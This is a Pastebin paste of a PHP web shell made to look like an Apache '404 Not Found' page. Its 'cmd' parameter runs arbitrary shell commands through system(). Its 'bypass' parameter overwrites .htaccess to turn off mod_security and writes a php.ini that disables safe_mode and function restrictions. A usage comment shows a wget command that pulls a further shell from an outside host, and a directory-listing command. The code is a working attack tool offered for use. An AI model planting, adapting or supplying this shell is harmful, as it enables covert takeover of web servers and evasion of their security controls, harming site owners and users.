API tools faq
paste
Advertisement
zeroc0d3

Simple Shell 404 with bypass php.ini and .htaccess

zeroc0d3
Jul 13th, 2015
1,104
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.49 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. /**
  3. Simple Shell 404 with bypass php.ini and .htaccess
  4. --------------------------------------------------------
  5. __________                  _________ _______       .___________  
  6. \____    /___________  ____ \_   ___ \\   _  \    __| _/\_____  \ Team
  7.   /     // __ \_  __ \/  _ \/    \  \//  /_\  \  / __ |   _(__  <
  8.  /     /\  ___/|  | \(  <_> )     \___\  \_/   \/ /_/ |  /       \
  9. /_______ \___  >__|   \____/ \______  /\_____  /\____ | /______  /
  10.         \/   \/                     \/       \/      \/        \/
  11.  
  12. ZeroC0d3 Team
  13. [ N0th1ng Imp0ss1bl3, Grey Hat Coder ]
  14. --------------------------------------------------------
  15. http://pastebin.com/u/zeroc0d3
  16. https://www.nulled.io/user/123090-zeroc0d3/
  17.  
  18. POC :
  19. ---------------------
  20. >>> Simple command :
  21. yoursite.com/404.php?cmd=wget -O zeroc0d3.php http://yourothersitewithshell/yourshell.txt
  22. yoursite.com/404.php?cmd=ls -alR
  23.  
  24. >>> Simple bypass :
  25. yoursite.com/404.php?bypass
  26.  
  27. **/
  28.  
  29. function head() {
  30.     function perlex() {
  31.         if (extension_loaded('perl')) {
  32.             echo('<strong>PERL</strong> - <i><u>Extension Loaded</u></i>');
  33.         } else {
  34.             echo('<strong>PERL</strong> - <i><u>Extension Not Loaded</u></i>');
  35.         }
  36.     }
  37.  
  38.     function pythonex() {
  39.         if (extension_loaded('python')) {
  40.             echo("<strong>PYTHON</strong> - <i><u>Extension Loaded</u></i>");
  41.         } else {
  42.             echo("<strong>PYTHON</strong> - <i><u>Extension Not Loaded</u></i>");
  43.         }
  44.     }
  45.  
  46.     if (isset($_REQUEST['cmd'])) {
  47.         echo "<pre>";
  48.         $cmd = ($_REQUEST['cmd']);
  49.         system($cmd);
  50.         echo "</pre>";
  51.         die ;
  52.     }
  53.     if (isset($_REQUEST['bypass'])) {
  54.         echo perlex();
  55.         echo "<br>";
  56.         echo pythonex();
  57.         $modsecby = @fopen(".htaccess", "w");
  58.         fwrite($modsecby, '<IfModule mod_security.c>
  59.    Sec------Engine Off
  60.    Sec------ScanPOST Off
  61. </IfModule>');
  62.         fclose($modsecby);
  63.         $phpinisecby1 = @fopen("php.ini", "w");
  64.         fwrite($phpinisecby1, 'safe_mode=OFF
  65. disable_functions=NONE');
  66.         fclose($phpinisecby1);
  67.         echo ".htaccess = bypass complete.<br>php.ini = bypass complete.";
  68.     }
  69. }
  70. ?>
  71. <html>
  72. <body>
  73.     <?php head(); ?>
  74.     <h1>Not Found</h1>
  75.     <p>The requested URL was not found on this server.</p>
  76.     <hr>
  77.     <address>Apache Server at localhost Port 80</address>
  78.     <style>
  79.          input { margin:0;background-color:#fff;border:1px solid #fff; }
  80.     </style>
  81. </body>
  82. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!